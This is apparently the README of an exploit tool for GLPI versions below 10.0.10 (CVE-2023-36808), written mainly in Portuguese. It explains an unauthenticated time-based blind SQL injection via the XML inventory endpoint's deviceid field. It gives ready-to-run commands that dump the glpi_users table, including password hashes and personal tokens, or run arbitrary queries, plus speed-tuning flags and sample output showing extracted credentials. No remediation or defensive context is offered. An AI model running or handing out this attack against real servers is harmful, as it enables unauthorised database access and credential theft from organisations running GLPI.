
GLPI cve-2023-36808
As versões < 10.0.10 do GLPI expõem um endpoint de inventário XML não autenticado em /front/inventory.php.
O campo <deviceid> é injetado diretamente em uma consulta SQL sem sanitização:
SELECT id FROM glpi_agents WHERE deviceid = '<INJECT>'
Nenhuma autenticação é necessária. A vulnerabilidade permite acesso total de leitura ao banco de dados por meio de injeção SQL cega.
Este script usa injeção cega baseada em tempo com pesquisa binária para extrair dados significativamente mais rápido que ferramentas genéricas.
pip install -r requirements.txt
# Dump the full glpi_users table (name, password hash, personal_token)
python3 exploit.py http://<TARGET>/glpi
# Custom SQL query
python3 exploit.py http://<TARGET>/glpi --query "SELECT @@version"
# Tune timing (lower sleep = faster, increase if you get wrong results)
python3 exploit.py http://<TARGET>/glpi --sleep 0.3
# Increase parallel request cap (default 2, raise on high-latency remote targets)
python3 exploit.py http://<TARGET>/glpi --parallel 4
[*] CVE-2023-36808 - GLPI Unauthenticated SQLi
[*] Target : http://10.0.0.1/glpi/front/inventory.php
[*] Sleep : 0.5s Threshold: 0.35s Parallel: 2
[+] Target reachable
[+] Injection confirmed
[*] User 1/7
name glpi
password $2y$10$xN.12pQxSLlQdMJzP26EWe...
personal_token xxxx
...